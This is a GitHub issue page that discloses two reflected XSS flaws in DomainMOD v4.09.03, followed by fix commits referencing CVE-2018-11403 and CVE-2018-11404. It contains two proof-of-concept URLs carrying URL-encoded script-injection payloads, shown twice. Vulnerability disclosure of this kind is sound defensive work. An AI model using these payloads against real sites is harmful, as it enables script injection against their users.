Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Two xss vulnerability was discovered in domainmod v4.09.03 There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.
1、http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
2、http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
The text was updated successfully, but these errors were encountered:
Fix CVE-2018-11403
3adf71b
https://nvd.nist.gov/vuln/detail/CVE-2018-11403 #63
Fix CVE-2018-11404
f10aefd
https://nvd.nist.gov/vuln/detail/CVE-2018-11404 #63
This issue was fixed in v4.10.
Sorry, something went wrong.
9faefd3
https://nvd.nist.gov/vuln/detail/CVE-2018-11403 domainmod#63
1ebceec
https://nvd.nist.gov/vuln/detail/CVE-2018-11404 domainmod#63
chetcuti
No branches or pull requests
Two xss vulnerability was discovered in domainmod v4.09.03
There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.
1、http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
2、http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
The text was updated successfully, but these errors were encountered: